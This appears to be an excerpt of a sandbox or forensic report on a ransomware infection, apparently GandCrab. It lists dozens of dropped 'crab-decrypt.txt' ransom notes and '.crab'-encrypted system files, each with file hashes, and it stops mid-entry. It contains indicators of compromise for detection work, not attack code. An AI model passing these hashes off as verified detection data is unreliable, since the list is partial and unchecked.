c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\network\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\network\connections\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\network\connections\pbk\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\network\connections\pbk\_hiddenpbk\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\office\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\office\recent\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\outlook\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\powerpoint\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\proof\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\protect\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\protect\s-1-5-21-3111613574-2524581245-2586426736-500\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\protect\s-1-5-21-3388679973-3930757225-3770151564-1000\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\publisher\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\publisher building blocks\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\speech\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\systemcertificates\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\systemcertificates\my\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\systemcertificates\my\certificates\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\systemcertificates\my\crls\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\systemcertificates\my\ctls\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\templates\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\uproof\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\word\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\word\startup\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\mozilla\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\mozilla\extensions\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\mozilla\firefox\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\mozilla\firefox\crash reports\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\mozilla\firefox\profiles\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\mozilla\firefox\profiles\silmbjec.default\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\mozilla\firefox\profiles\silmbjec.default\bookmarkbackups\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\mozilla\firefox\profiles\silmbjec.default\indexeddb\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\mozilla\firefox\profiles\silmbjec.default\indexeddb\moz-safe-about+home\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\mozilla\firefox\profiles\silmbjec.default\indexeddb\moz-safe-about+home\idb\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\mozilla\firefox\profiles\silmbjec.default\indexeddb\moz-safe-about+home\idb\818200132aebmoouht\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\mozilla\firefox\profiles\silmbjec.default\minidumps\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\mozilla\firefox\profiles\silmbjec.default\webapps\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\contacts\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\windows\cookies\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\desktop\uyrs 3lrpz\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\desktop\uyrs 3lrpz\szfzfgtq8necac\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\desktop\uyrs 3lrpz\szfzfgtq8necac\9o5pum0skr0vpqawoif\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\desktop\uyrs 3lrpz\szfzfgtq8necac\9o5pum0skr0vpqawoif\py36c35uyq5zx0u1gb\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\documents\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\documents\5a6dq a\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\music\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\pictures\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\documents\my shapes\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\documents\my shapes\_private\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\videos\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\documents\outlook files\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\downloads\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\favorites\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\favorites\links\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\favorites\microsoft websites\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\favorites\msn websites\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\favorites\windows live\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\links\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\music\n6zv9eawsn-5\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\music\n6zv9eawsn-5\in2oi15yt\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\music\n6zv9eawsn-5\in2oi15yt\inl4q\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\music\n6zv9eawsn-5\in2oi15yt\xr01\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\music\n6zv9eawsn-5\in2oi15yt\xr01\24endo2rsr15sdp3\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\music\n6zv9eawsn-5\in2oi15yt\xr01\24endo2rsr15sdp3\c06iavekw\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\music\n6zv9eawsn-5\in2oi15yt\xr01\24endo2rsr15sdp3\c06iavekw\xxqwypul\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\music\n6zv9eawsn-5\in2oi15yt\xr01\24endo2rsr15sdp3\c06iavekw\xxqwypul\1onm- n_x9gcx_j\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\music\n6zv9eawsn-5\in2oi15yt\xr01\24endo2rsr15sdp3\vvfu7-c\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\music\n6zv9eawsn-5\in2oi15yt\xr01\za4gzzm\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\windows\network shortcuts\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\pictures\0wo6ya\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\pictures\6gnobpugwk\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\pictures\t7skzdy8\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\pictures\t7skzdy8\8fz7awe3ry9cqpnp_co\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\pictures\t7skzdy8\lm81\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\pictures\t7skzdy8\lm81\i7bysmfgkjw8gx 1\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\pictures\t7skzdy8\lm81\jluw_zq5f\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\boot.sdi.crab 3.02 MB MD5: 2cec38c1d334b4aa2522512dcd24c18f
SHA1: f66ebde14fdd76d334395979dae499f3bedf9738
SHA256: c1d6cbc9fc70d1652e00b4106947b31129cd42c13c082e3d6b14a6ab64e5250c
False
c:\recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\winre.wim.crab 10.00 MB MD5: 5e4bbe6272835f45190a7b735c3091d1
SHA1: 7aaa8c3792fd12bc76c0780a0183143f338c046c
SHA256: f899185b99ebc772e9d71bb71f0bbbb100b13ec321f15423053faf18f4ab3d0e
False
c:\system volume information\spp\onlinemetadatacache\{00c95144-e912-40b3-a2d1-b8e12bc815d0}_ondisksnapshotprop.crab 2.91 KB MD5: 3e6edfac03332e7e2c56816ed1723540
SHA1: 61430c3943ecd8bc719c0387bf517acd4c01b173
SHA256: 8a14380163ac90d74004061ce53bd2de68d2cfd676fd991b1cef4666e0591c90
False
c:\system volume information\spp\onlinemetadatacache\{1ce95dd8-c40b-44fd-a9e6-d72d44ed8f39}_ondisksnapshotprop.crab 2.74 KB MD5: a54aebc3110f8ffff83a0a2d6d1b229b
SHA1: 9ae37167b6cd8f79364b3e102832bb9f3cece342
SHA256: aa675210533d518209259ccdcc59aa6afa8766994a1341b7f1afb5bc1f932e01
False
c:\system volume information\spp\onlinemetadatacache\{1e9425cc-553b-418f-b0c6-ad1ac9e1ba0c}_ondisksnapshotprop.crab 3.87 KB MD5: 54b21b8373e75f2e3501ce82ecc1d048
SHA1: 9c7b523224293d71c4c86c75440a39c4aca3f087
SHA256: 7823c383234279f526925ed6ef2968082a32cd77690fffe4932086608a4a716f
False
c:\system volume information\spp\onlinemetadatacache\{29088c66-de5f-456f-85c0-6e4156f94358}_ondisksnapshotprop.crab 3.73 KB MD5: 30c9bb57fb7a6213c4633e5749c39362
SHA1: a69fb77c07e33315452896cf0578da683b49d8e9
SHA256: f578af7e0ce9f9d7d3073b111e8e9c277f72184b4d2cdfb3b2adced41be3e04b
False
c:\system volume information\spp\onlinemetadatacache\{29296136-1f54-4fd8-b5c7-32fc96ef3c76}_ondisksnapshotprop.crab 4.05 KB MD5: 33d23a8886c98ddb35562f2248900046
SHA1: 3f9fd6d6c8238fb94a2ed74945c226431be943e4
SHA256: e00d87a0ad48502fc8c2d47a00d1ee11e879904e411eb0c2e56659ff0fbf42cf
False
c:\system volume information\spp\onlinemetadatacache\{4204ee1b-0338-4788-b199-d83e4955faf1}_ondisksnapshotprop.crab 3.62 KB MD5: 06476c9a1e2de80b2c578c911051685d
SHA1: e5682e1b0bb261f965d9509e961f67ffef424526
SHA256: c71eefff35c64678d4b1de8979b3e40243bddaa939a0cd024b5d8faac7a1ce13
False
c:\system volume information\spp\onlinemetadatacache\{425865b3-1a09-4be3-8a97-1baffda74ed0}_ondisksnapshotprop.crab 3.38 KB MD5: 5d561f7df3e609f73208f3251870a249
SHA1: 715c03deff23da67e219462586286f47925ca0f8
SHA256: 9927225620453bc2b3b85e3ed686833e55c87a4294b910ae48af6ce86b672546
False
c:\system volume information\spp\onlinemetadatacache\{51296d62-5aa5-412e-9a8f-abe77cd15e9e}_ondisksnapshotprop.crab 1.34 KB MD5: 683d852cef0ba6c4d6f207f592647b23
SHA1: b6e14166333709828bca34ccf5579ac844aab452
SHA256: b291686b0fd11017cb5093d800677c3b4e2bd6bb2e03553f1f5bec59845087ca
False
c:\system volume information\spp\onlinemetadatacache\{5ac56584-2304-47b9-b262-8d3164a52d9e}_ondisksnapshotprop.crab 3.07 KB MD5: e520ded96d789e49c6897d23fd5aca23
SHA1: 0028a3fe5944d4e26ae43079464bd2fe8b3a9c24
SHA256: b747b7e72eb5fd5e5de9d8db65669e86942b474b4be180220d4a49c544fb5ae2
False
c:\system volume information\spp\onlinemetadatacache\{77ac2c2c-d323-4d07-bbbc-9f6908de6f91}_ondisksnapshotprop.crab 3.87 KB MD5: a46e0f5b3e0317913bae4139ed43ea75
SHA1: acfdeafb69ec414c56a0521da4383c1ad4e6c35b
SHA256: bf9e0ac8d4e761576c6b44fe502788ff8a50f58e03783e0b98fed5a1f6950e56
False
c:\system volume information\spp\onlinemetadatacache\{7a521dbe-9658-44e5-843c-29dd5c50d136}_ondisksnapshotprop.crab 3.85 KB MD5: 720cee68a61b206a018308077dfb60af
SHA1: 4e49370e48174b7920b4cd1646248937529da164
